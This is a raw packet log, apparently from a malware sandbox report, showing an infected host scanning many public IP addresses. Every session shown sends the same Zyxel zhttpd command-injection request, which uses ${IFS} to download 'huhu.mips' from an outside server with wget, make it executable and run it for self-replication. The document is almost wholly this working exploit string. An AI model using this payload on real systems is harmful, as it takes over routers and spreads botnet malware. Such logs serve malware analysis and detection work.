                                                        Feb 2, 2024 06:21:18.091799974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6401192.168.2.145049461.213.183.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091830015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6402192.168.2.143464485.141.104.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091878891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6403192.168.2.1443112170.36.232.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091917992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6404192.168.2.1452710188.53.33.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091953039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6405192.168.2.1449388216.26.238.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.091996908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6406192.168.2.145599686.212.170.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092031002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6407192.168.2.1447456159.110.70.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092062950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6408192.168.2.1441418145.73.95.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092129946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6409192.168.2.144281812.181.111.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092168093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6410192.168.2.1443020162.194.177.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092214108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6411192.168.2.144336474.56.35.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092252970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6412192.168.2.1459154193.109.210.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092286110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6413192.168.2.1448828171.42.2.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092313051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6414192.168.2.145800673.157.22.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092360973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6415192.168.2.144651876.98.254.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092396975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6416192.168.2.1446186199.217.168.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092437983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6417192.168.2.145666469.70.170.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092492104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6418192.168.2.1436330173.6.182.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092528105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6419192.168.2.1440566125.159.211.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092551947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6420192.168.2.1451336199.211.202.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092600107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6421192.168.2.1436334136.171.84.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092642069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6422192.168.2.145121690.64.179.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092703104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6423192.168.2.145799245.189.72.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092715025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6424192.168.2.1436174203.143.211.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092750072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6425192.168.2.143292813.239.50.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092786074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6426192.168.2.145105857.217.53.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092818022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6427192.168.2.145112849.145.216.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092864037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6428192.168.2.145203240.180.43.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092900991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6429192.168.2.1437722116.55.205.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092931032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6430192.168.2.1444614105.40.179.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092978001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6431192.168.2.145018440.45.201.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.092997074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6432192.168.2.143902260.202.246.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093044996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6433192.168.2.145923441.176.228.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093071938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6434192.168.2.1439104118.141.155.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093116999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6435192.168.2.1445812147.158.127.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093146086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6436192.168.2.145768839.7.31.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093195915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6437192.168.2.144731863.85.182.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093249083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6438192.168.2.1444878155.183.180.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093282938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6439192.168.2.144310086.169.212.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093311071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6440192.168.2.14396809.160.177.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093343973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6441192.168.2.1446506179.208.218.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093374968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6442192.168.2.143545035.106.84.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093414068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6443192.168.2.1444916116.80.43.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093447924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6444192.168.2.1437472139.77.49.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093507051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6445192.168.2.144806841.123.194.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093533993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6446192.168.2.1443482217.143.173.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093559980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6447192.168.2.144959287.186.118.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093592882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6448192.168.2.145796265.114.129.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093636036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6449192.168.2.144257849.67.123.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093692064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6450192.168.2.1449524137.192.174.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093722105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6451192.168.2.145072492.49.160.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093754053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6452192.168.2.1435248209.94.181.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093800068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6453192.168.2.1458488200.211.28.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093844891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6454192.168.2.144161452.79.142.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093879938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6455192.168.2.1457166161.143.70.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093914986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6456192.168.2.1432988108.189.228.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093965054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6457192.168.2.143522042.73.221.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.093983889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6458192.168.2.1455036148.13.22.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094041109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6459192.168.2.1439552197.251.129.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094069004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6460192.168.2.1441856132.124.35.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094094992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6461192.168.2.143754861.21.37.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094124079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6462192.168.2.143486053.48.192.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094166994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6463192.168.2.143760657.230.109.17443
                                                        TimestampBytes transferredDirectionData
